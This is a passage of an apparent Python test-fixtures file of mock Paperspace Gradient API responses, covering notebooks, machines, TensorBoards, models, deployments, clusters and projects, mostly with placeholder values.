xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617088427", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1823 }, { "name": "some_notebook_name", "handle": "n8h0d5lf", "jobHandle": "js63sf787xc3mx", "project": "Notebook-some_notebook_name", "projectHandle": "prupasg3e", "state": "Error", "token": None, "container": "some_name", "containerUrl": "some_name", "baseContainer": "some_name", "baseContainerUrl": "some_name", "vmType": "G1", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "n8h0d5lf.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": "Error pulling container during provisioning for job js63sf787xc3mx: Error pulling image 'some_name': Error response from daemon: Get https://registry-1.docker.io/v2/library/some_name/manifests/latest: unauthorized: incorrect username or password", "dtCreated": "2019-08-30T12:31:43.392Z", "dtModified": "2019-08-30T12:31:43.392Z", "dtProvisioningStarted": "2019-08-30T12:33:34.650Z", "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-08-30T12:33:35.479Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 8, "jobId": 20163, "isPublic": False, "isPreemptible": True, "cpuHostname": "gradient-host-1567168315", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "1783380 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1811 }, { "name": "some_notebook_name", "handle": "nl0b6cn0", "jobHandle": "jss28gdrarcbrw", "project": "Notebook-some_notebook_name", "projectHandle": "pr43jj028", "state": "Error", "token": None, "container": "some_name", "containerUrl": "some_name", "baseContainer": "some_name", "baseContainerUrl": "some_name", "vmType": "G1", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "nl0b6cn0.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": "Error pulling container during provisioning for job jss28gdrarcbrw: Error pulling image 'some_name': Error response from daemon: Get https://registry-1.docker.io/v2/library/some_name/manifests/latest: unauthorized: incorrect username or password", "dtCreated": "2019-08-30T12:16:11.944Z", "dtModified": "2019-08-30T12:16:11.944Z", "dtProvisioningStarted": "2019-08-30T12:16:19.646Z", "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-08-30T12:16:20.382Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 8, "jobId": 20162, "isPublic": False, "isPreemptible": True, "cpuHostname": "gradient-host-1567167274", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "1783380 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1810 }, { "name": "some_notebook_name", "handle": "njmq1zju", "jobHandle": "jd35vd65dkqch", "project": "Notebook-some_notebook_name", "projectHandle": "prflq2sy0", "state": "Error", "token": None, "container": "None", "containerUrl": "None", "baseContainer": "None", "baseContainerUrl": "None", "vmType": "G1", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "njmq1zju.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": "Error pulling container during provisioning for job jd35vd65dkqch: Error pulling image 'None': Error response from daemon: Get https://registry-1.docker.io/v2/library/None/manifests/latest: unauthorized: incorrect username or password", "dtCreated": "2019-08-30T12:14:32.296Z", "dtModified": "2019-08-30T12:14:32.296Z", "dtProvisioningStarted": "2019-08-30T12:16:08.347Z", "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-08-30T12:16:09.132Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 8, "jobId": 20161, "isPublic": False, "isPreemptible": True, "cpuHostname": "gradient-host-1567167274", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "1783380 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1809 }, { "name": "some_notebook_name", "handle": "nfcuwqu5", "jobHandle": "je2cmiigxwhy0", "project": "Notebook-some_notebook_name", "projectHandle": "prl9nu5p7", "state": "Error", "token": None, "container": "some_name", "containerUrl": "some_name", "baseContainer": "some_name", "baseContainerUrl": "some_name", "vmType": "G1", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "nfcuwqu5.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": "Error pulling container during provisioning for job je2cmiigxwhy0: Error pulling image 'some_name': Error response from daemon: Get https://registry-1.docker.io/v2/library/some_name/manifests/latest: unauthorized: incorrect username or password", "dtCreated": "2019-08-30T12:13:30.657Z", "dtModified": "2019-08-30T12:13:30.657Z", "dtProvisioningStarted": "2019-08-30T12:15:11.388Z", "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-08-30T12:15:12.207Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 8, "jobId": 20160, "isPublic": False, "isPreemptible": True, "cpuHostname": "gradient-host-1567167224", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "1783380 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1808 } ], "availableMachines": [ { "vmTypeId": 5, "clusterId": 1, "isAvailable": False, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "0", "numAvailableNodes": "0", "id": 11, "cluster": { "name": "PS Notebooks", "type": 1, "regionId": 1, "showDisabled": False, "dtCreated": "2017-11-03T19:09:41.077Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "cls28l0qm", "cloud": None, "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 1 } }, { "vmTypeId": 7, "clusterId": 1, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "1", "id": 15, "cluster": { "name": "PS Notebooks", "type": 1, "regionId": 1, "showDisabled": False, "dtCreated": "2017-11-03T19:09:41.077Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "cls28l0qm", "cloud": None, "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 1 } }, { "vmTypeId": 20, "clusterId": 3, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "2", "numAvailableNodes": "0", "id": 7, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 20, "clusterId": 3, "isAvailable": True, "isPreemptible": True, "showDisabled": False, "numActiveNodes": "2", "numAvailableNodes": "0", "id": 6, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 21, "clusterId": 3, "isAvailable": True, "isPreemptible": True, "showDisabled": False, "numActiveNodes": "0", "numAvailableNodes": "0", "id": 22, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 21, "clusterId": 3, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "0", "numAvailableNodes": "0", "id": 23, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 25, "clusterId": 3, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "0", "id": 27, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 25, "clusterId": 3, "isAvailable": True, "isPreemptible": True, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "0", "id": 26, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 31, "clusterId": 90, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "1", "id": 1, "cluster": { "name": "Free Public Notebooks", "type": 1, "regionId": 2, "showDisabled": False, "dtCreated": "2019-06-18T23:33:58.997Z", "dtModified": "2019-08-12T17:06:19.492Z", "dtDeleted": None, "handle": "cltwhzxx6", "cloud": None, "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 90 } }, { "vmTypeId": 32, "clusterId": 90, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "1", "id": 12, "cluster": { "name": "Free Public Notebooks", "type": 1, "regionId": 2, "showDisabled": False, "dtCreated": "2019-06-18T23:33:58.997Z", "dtModified": "2019-08-12T17:06:19.492Z", "dtDeleted": None, "handle": "cltwhzxx6", "cloud": None, "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 90 } } ], "total": 9, "runningTotal": 2, "displayTotal": 9 } TENSORBOARD_CREATE_RESPONSE_JSON = { "message": "success", "data": { "cluster_id": "some_cluster_id", "url": None, "id": "some_id", "instance": None, "dt_created": "2019-09-18T12:10:09.817102+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "some_project_id", "id": "some_experiment_id" }, { "project_id": "some_project_id", "id": "some_other_experiment_id" } ], "dt_deleted": None } } TENSORBOARD_DETAIL_RESPONSE_JSON = { "message": "success", "data": { "cluster_id": "some_cluster_id", "url": "https://aws-testing.paperspace.io/tensorboard/some_id/", "id": "some_id", "instance": { "type": "cpu", "size": "large", "count": 2 }, "dt_created": "2019-09-18T12:10:09.817102+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "some_project_id", "id": "some_experiment_id", "state": "Some State" }, { "project_id": "some_project_id", "id": "some_other_experiment_id", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" } } TENSORBOARD_UPDATE_RESPONSE_JSON = { "message": "success", "data": { "cluster_id": "some_cluster_id", "url": "https://aws-testing.paperspace.io/tensorboard/some_id/", "id": "some_id", "instance": { "type": "cpu", "size": "large", "count": 2 }, "dt_created": "2019-09-18T12:10:09.817102+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "some_project_id", "id": "some_experiment_id", "state": "Some State" }, { "project_id": "some_project_id", "id": "some_other_experiment_id", "state": "Some State" }, { "project_id": "some_project_id", "id": "some_third_experiment_id", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" } } TENSORBOARD_UPDATE_REMOVE_RESPONSE_JSON = { "message": "success", "data": { "cluster_id": "some_cluster_id", "url": "https://aws-testing.paperspace.io/tensorboard/some_id/", "id": "some_id", "instance": { "type": "cpu", "size": "large", "count": 2 }, "dt_created": "2019-09-18T12:10:09.817102+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "some_project_id", "id": "some_experiment_id", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" } } TENSORBOARD_LIST_RESPONSE_JSON = { "message": "success", "data": [ { "cluster_id": "clmtkpnm2", "url": "https://aws-testing.paperspace.io/tensorboard/tbrs2kcjman4ly/", "id": "tbrs2kcjman4ly", "instance": None, "dt_created": "2019-09-16T09:28:10.415478+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "prrdpg67x", "id": "ers2kcjman4ly", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" }, { "cluster_id": "clmtkpnm2", "url": "https://aws-testing.paperspace.io/tensorboard/tbskzep6d9po04d/", "id": "tbskzep6d9po04d", "instance": None, "dt_created": "2019-09-16T09:28:56.908450+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "prrdpg67x", "id": "ers2kcjman4ly", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" }, { "cluster_id": "clmtkpnm2", "url": "https://aws-testing.paperspace.io/tensorboard/tbsaq6hggzxcnet/", "id": "tbsaq6hggzxcnet", "instance": None, "dt_created": "2019-09-16T12:59:20.788663+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "prrdpg67x", "id": "ers2kcjman4ly", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" }, { "cluster_id": "clmtkpnm2", "url": "https://aws-testing.paperspace.io/tensorboard/tbwuzalec7ik58/", "id": "tbwuzalec7ik58", "instance": { "size": "large", "type": "cpu", "count": 2 }, "dt_created": "2019-09-17T07:43:39.679876+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "prrdpg67x", "id": "ers2kcjman4ly", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" } ] } TENSORBOARD_DELETE_RESPONSE_JSON = { "message": "success" } LIST_JOB_FILES_RESPONSE_JSON = { 'data': [ { "file": "hello.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/artifacts/hello.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=7CT5k6buEmZe5k5E7g6BXMs2xV4%3D&response-content-disposition=attachment%3Bfilename%3D%22hello.txt%22&x-amz-security-token=some_amz_security_token" }, { "file": "hello2.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/artifacts/hello2.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=L1lI47cNyiROzdYkf%2FF3Cm3165E%3D&response-content-disposition=attachment%3Bfilename%3D%22hello2.txt%22&x-amz-security-token=some_amz_security_token" }, { "file": "keton/elo.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/artifacts/keton/elo.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=tHriojGx03S%2FKkVGQGVI5CQRFTo%3D&response-content-disposition=attachment%3Bfilename%3D%22elo.txt%22&x-amz-security-token=some_amz_security_token" } ], } GET_PRESIGNED_URL_FOR_S3_BUCKET_RESPONSE_JSON = { "data": { "bucket_name": "ps-projects", "fields": { "AWSAccessKeyId": "SOME_AWS_ACCESS_KEY_ID", "key": "some/path/to/file/demo.zip", "policy": "base64policy=", "signature": "base64signature=" }, "url": "https://ps-projects.s3.amazonaws.com/" }, "message": "success" } DELETE_MODEL_404_RESPONSE_JSON = { "error": { "name": "Error", "status": 404, "message": "Unable to find model", }, } MODEL_CREATE_RESPONSE_JSON_V2 = { "id": "some_model_id", "projectId": None, "experimentId": None, "updatedByUserId": "ukgvw4i8", "updatedByUserEmail": "asd@paperspace.com", "modelType": "Custom", "name": "some_name", "tag": None, "summary": None, "detail": None, "params": None, "url": None, "notes": None, "isDeleted": False, "isPublic": False, "dtCreated": "2020-04-01T14:15:39.371Z", "dtModified": "2020-04-01T14:15:39.371Z", "dtUploaded": None, "dtDeleted": None, "modelPath": None, "deploymentState": None, "tags": None } MODEL_UPLOAD_GET_PRESIGNED_URL_RESPONSE = "https://ps-customstorage-development.s3.amazonaws.com/teo6raui0/models/" \ "moslrdsp1q4z4a2/keton.txt?AWSAccessKeyId=AKIAVWO7J5OJXEKIB7EJ&Content-Typ" \ "e=text%2Fplain&Expires=1585779340&Signature=82UPgvg0yBayLJCLMiNq6jc4mys%3D" MODEL_UPLOAD_RESPONSE_JSON = { "id": "some_model_id", "projectId": None, "experimentId": None, "updatedByUserId": "ukgvw4i8", "updatedByUserEmail": "some_email@paperspace.com", "modelType": "Tensorflow", "name": "some_name", "tag": None, "summary": {"key": "value"}, "detail": None, "params": None, "url": "s3://ps-projects-development/teo6raui0/models/some_model_id/saved_model.pb", "notes": "some notes", "isDeleted": False, "isPublic": False, "dtCreated": "2019-11-26T13:33:11.001Z", "dtModified": "2019-11-26T13:33:11.001Z", "dtUploaded": None, "dtDeleted": None, "modelPath": None, "deploymentState": None, } MODEL_DETAILS_RESPONSE_JSON = { "modelList": [ { "id": "some_id", "projectId": "some_project_id", "experimentId": "some_experiment_id", "updatedByUserId": "some_user_id", "updatedByUserEmail": "paperspace@paperspace.com", "modelType": "Tensorflow", "name": "some_name", "tag": None, "summary": None, "detail": None, "params": None, "url": "s3://ps-projects-development/asdf/some_project_id/some_experiment_id/model", "notes": None, "isDeleted": False, "isPublic": False, "dtCreated": "2019-12-13T23:00:26.077Z", "dtModified": "2019-12-13T23:00:26.077Z", "dtUploaded": None, "dtDeleted": None, "modelPath": None, "deploymentState": "Stopped" } ], "total": 96, "displayTotal": 1 } MODEL_DETAILS_RESPONSE_JSON_WITH_TAGS = { "modelList": [ { "id": "some_id", "projectId": "some_project_id", "experimentId": "some_experiment_id", "updatedByUserId": "some_user_id", "updatedByUserEmail": "paperspace@paperspace.com", "modelType": "Tensorflow", "name": "some_name", "tag": None, "tags": [ "tag1", "tag2" ], "summary": None, "detail": None, "params": None, "url": "s3://ps-projects-development/asdf/some_project_id/some_experiment_id/model", "notes": None, "isDeleted": False, "isPublic": False, "dtCreated": "2019-12-13T23:00:26.077Z", "dtModified": "2019-12-13T23:00:26.077Z", "dtUploaded": None, "dtDeleted": None, "modelPath": None, "deploymentState": "Stopped" } ], "total": 96, "displayTotal": 1 } LIST_MODEL_FILES_RESPONSE_JSON = [ { "file": "hello.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/model/hello.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=7CT5k6buEmZe5k5E7g6BXMs2xV4%3D&response-content-disposition=attachment%3Bfilename%3D%22hello.txt%22&x-amz-security-token=some_amz_security_token" }, { "file": "hello2.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/model/hello2.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=L1lI47cNyiROzdYkf%2FF3Cm3165E%3D&response-content-disposition=attachment%3Bfilename%3D%22hello2.txt%22&x-amz-security-token=some_amz_security_token" }, { "file": "keton/elo.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/model/keton/elo.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=tHriojGx03S%2FKkVGQGVI5CQRFTo%3D&response-content-disposition=attachment%3Bfilename%3D%22elo.txt%22&x-amz-security-token=some_amz_security_token" } ] GET_DEPLOYMENT_DETAILS_JSON_RESPONSE = { "deploymentList": [ { "id": "some_id", "ownerId": "some_owner_id", "projectId": "some_project_id", "experimentId": "some_experiment_id", "state": "Stopped", "startedByUserId": "some_user_id", "startedByUserEmail": "some@address.com", "deploymentType": "TFServing", "deploymentTypeDescription": "Tensorflow Serving on K8s", "modelId": "some_model_id", "modelUrl": "s3://ps-projects/asdf/some/model/url", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "KPS Jobs", "clusterId": "some_cluster_id", "machineType": "p3.2xlarge", "imageUrl": "tensorflow/serving", "imageUsername": None, "imagePassword": None, "imageServer": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": None, "annotations": {}, "oauthKey": None, "oauthSecret": None, "serviceType": "model", "apiType": "REST", "endpoint": "https://paperspace.io/model-serving/some_id:predict", "ports": None, "dtCreated": "2020-01-13T22:21:28.210Z", "dtModified": "2020-01-14T00:32:27.577Z", "dtBuildStarted": "2020-01-13T22:21:28.482Z", "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2020-01-13T22:48:40.107Z", "dtDeleted": None, "isDeleted": False, "modelType": "Tensorflow", "modelPath": None, "command": "some deployment command", "args": None, "env": None, "containerModelPath": None, "containerUrlPath": None, "endpointUrlPath": None, "method": None, "tags": ["tag1", "tag2"], "metricsURL": "aws-testing.paperspace.io", "autoscaling": { "minInstanceCount": 4, "maxInstanceCount": 64, "scaleCooldownPeriod": 123, "metrics": [ { "type": "Resource", "name": "cpu", "valueType": "targetAverage", "value": 10, }, { "type": "Metric", "name": "loss", "valueType": "target", "value": 2, }, { "type": "Metric", "name": "keton", "valueType": "target", "value": 21.37, }, ], }, }, ], "total": 129, "displayTotal": 129, "runningTotal": 0 } GET_CLUSTER_DETAILS_RESPONSE = { "id": "some_cluster_id", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "some_team_id", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 1, "isPrivate": True, "modelName": "team", "modelId": 1, "nodes": [ { "id": "cmsq4u0gf0m971f", "name": "default", "clusterId": "cluwffvkb", "activeJobId": None, "machineId": None, "dtCreated": "2019-11-21T10:06:27.602Z", "dtModified": "2019-11-21T10:06:27.602Z", "dtDeleted": None, "dtHeartbeat": None, "nodeAttrs": None } ] } GET_V1_CLUSTER_DETAILS_RESPONSE = { "id": "some_cluster_id", "name": "EKS testing", "type": "Job Cluster", "region": "Private", "cloud": "aws", "teamId": "some_team_id", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 1, "isPrivate": True, "modelName": "team", "modelId": 1, "nodes": [ { "id": "some_node_id", "name": "default", "clusterId": "some_cluster_id", "activeJobId": None, "machineId": None, "dtCreated": "2019-11-21T10:06:27.602Z", "dtModified": "2019-11-21T10:06:27.602Z", "dtDeleted": None, "dtHeartbeat": None, "nodeAttrs": None } ] } DETAILS_OF_PROJECT = { "data": [ { "name": "some_name", "handle": "some_id", "dtCreated": "2020-02-07T11:43:34.335Z", "dtDeleted": None, "lastJobSeqNum": 44, "repoNodeId": None, "repoName": None, "repoUrl": None, "tags": None, "buildPullRequests": True, "buildForks": False, "buildBranches": "default", "experiments": { "data": [ { "dtCreated": "2020-02-13T16:02:22.978027+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2020-02-13T16:02:22.978027+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 70590, "experimentTemplateId": 7156, "experimentTypeId": 2, "handle": "some_handle", "id": 70557, "projectHandle": "some_id", "projectId": 49107, "started_by_user_id": 192354, "state": 1, "templateHistory": { "cliCommand": "gradient experiments create multinode --name some_name --projectId some_id --experimentType GRPC --workerContainer python --workerMachineType c5.xlarge --workerCommand \"python script.py\" --workerCount 2 --parameterServerContainer python --parameterServerMachineType c5.xlarge --parameterServerCommand \"python script.py\" --parameterServerCount 1 --workspaceUrl s3://some_workspace.url --clusterId some_cluster_id --ports 5000:5000", "dtCreated": "2020-02-13T16:02:21.263923+00:00", "dtDeleted": None, "experimentTemplateId": 7156, "id": 70590, "params": { "cluster_id": "some_cluster_id", "is_preemptible": False, "name": "some_name", "parameter_server_command": "python script.py", "parameter_server_container": "python", "parameter_server_count": 1, "parameter_server_machine_type": "c5.xlarge", "parameter_server_use_dockerfile": False, "ports": "5000:5000", "project_handle": "some_id", "version": "v2", "worker_command": "python script.py", "worker_container": "python", "worker_count": 2, "worker_machine_type": "c5.xlarge", "worker_use_dockerfile": False, "workspace_url": "s3://some_workspace.url" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "some_id" }, "totalItems": 40 } } } ], "meta": { "where": { "handle": "some_id" }, "totalItems": 1 }, "tagFilter": [] } DETAILS_OF_PROJECT_WITH_TAGS = { "data": [ { "name": "some_name", "handle": "some_id", "dtCreated": "2020-02-07T11:43:34.335Z", "dtDeleted": None, "lastJobSeqNum": 44, "repoNodeId": None, "repoName": None, "repoUrl": None, "tags": [ "tag1", "tag2" ], "buildPullRequests": True, "buildForks": False, "buildBranches": "default", "experiments": { "data": [ { "dtCreated": "2020-02-13T16:02:22.978027+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2020-02-13T16:02:22.978027+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 70590, "experimentTemplateId": 7156, "experimentTypeId": 2, "handle": "some_handle", "id": 70557, "projectHandle": "some_id", "projectId": 49107, "started_by_user_id": 192354, "state": 1, "templateHistory": { "cliCommand": "gradient experiments create multinode --name some_name --projectId some_id --experimentType GRPC --workerContainer python --workerMachineType c5.xlarge --workerCommand \"python script.py\" --workerCount 2 --parameterServerContainer python --parameterServerMachineType c5.xlarge --parameterServerCommand \"python script.py\" --parameterServerCount 1 --workspaceUrl s3://some_workspace.url --clusterId some_cluster_id --ports 5000:5000", "dtCreated": "2020-02-13T16:02:21.263923+00:00", "dtDeleted": None, "experimentTemplateId": 7156, "id": 70590, "params": { "cluster_id": "some_cluster_id", "is_preemptible": False, "name": "some_name", "parameter_server_command": "python script.py", "parameter_server_container": "python", "parameter_server_count": 1, "parameter_server_machine_type": "c5.xlarge", "parameter_server_use_dockerfile": False, "ports": "5000:5000", "project_handle": "some_id", "version": "v2", "worker_command": 